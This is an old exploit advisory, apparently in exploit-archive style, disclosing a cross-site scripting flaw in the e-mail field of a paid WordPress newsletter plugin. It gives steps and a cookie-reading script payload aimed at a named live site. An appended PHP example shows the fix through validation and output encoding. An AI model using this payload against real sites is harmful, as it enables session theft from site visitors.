########################### INFORMATION ###############################################
#
#
# [+] Exploit Title: WordPress Newsletter Plugin - Cross Site Scripting (XSS) Vulnerabilities
# [+] Date: 25-07-2010
# [+] Author: bursali | admin[at]bursali.eu | www.bursali.eu
# [+] Software Link: http://tribulant.com/products/view/1/wordpress-mailing-list
# [+] Price: $49.99
# [+] Version: v3.8.3 & older versions
# [+] Tested on: PHP
# [+] Dork: Use your brain (;
#
# [?] Greetz to: GabberGandalf, fred777, J0hn.X3r, Montaxx, DeeWayne,
# Nazrek, gf0x, Sawyer, VeN0m, Lidloses_Auge, Suicide, Toastbrot,
# Dexx, enco, soulstoned, HooHead, Cyb3r P1rat, DizzY_D, Free-Hack,
# and the wh0le other morons ;D
#
#
#########################################################################################
########################## Exploit #############################
The "EMail Address" form field is vulnerable.
Example:
Put your XSS code into the EMail field and add a quotation mark before your XSS code. (;
Live Example:
-> Go to: http://wpml.wpplugins.biz/
-> Put that into the EMail Field: "< script>alert(document.cookie)< /script>
-> Remove spaces.
-> *-*
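
Added example (not part of the original advisory and not the plugin's code): a minimal PHP sketch of the fix for this class of bug, assuming the submitted address is echoed back into a double-quoted HTML attribute, which is what the leading quotation mark above suggests. The function names, the form markup and the sample inputs are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical renderer (not the plugin's code): reflects the submitted
// value into a double-quoted attribute without encoding it.
function render_email_field_unsafe(string $submitted): string
{
    return '<input type="text" name="email" value="' . $submitted . '">';
}

// Hardened renderer: only a syntactically valid address is reflected, and
// it is encoded for the attribute context in every case. Validation alone
// is not enough, since address validators may accept quoted local parts.
function render_email_field_safe(string $submitted): string
{
    $email = filter_var(trim($submitted), FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $email = ''; // never reflect input that failed validation
    }
    $encoded = htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="email" value="' . $encoded . '">';
}

// True when the output is no longer one <input> tag with three quoted
// attributes, i.e. the value broke out of its attribute.
function broke_out_of_attribute(string $html): bool
{
    return substr_count($html, '<') !== 1 || substr_count($html, '"') !== 6;
}

// Constructed sample inputs: a normal address and a harmless markup probe
// that starts with a quotation mark.
$samples = ['user@example.com', '"><i>probe</i>'];

foreach ($samples as $input) {
    foreach (['render_email_field_unsafe', 'render_email_field_safe'] as $render) {
        $html = $render($input);
        printf("%-26s %-5s %s\n", $render,
            broke_out_of_attribute($html) ? 'BREAK' : 'ok', $html);
    }
}
```

Inside WordPress the same two roles are played by is_email() for validation and esc_attr() for output encoding.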
########################## LAST WORDS #############################
Visit www.bursali.eu - Home of the CyberTerrorist <3
~bursali
#####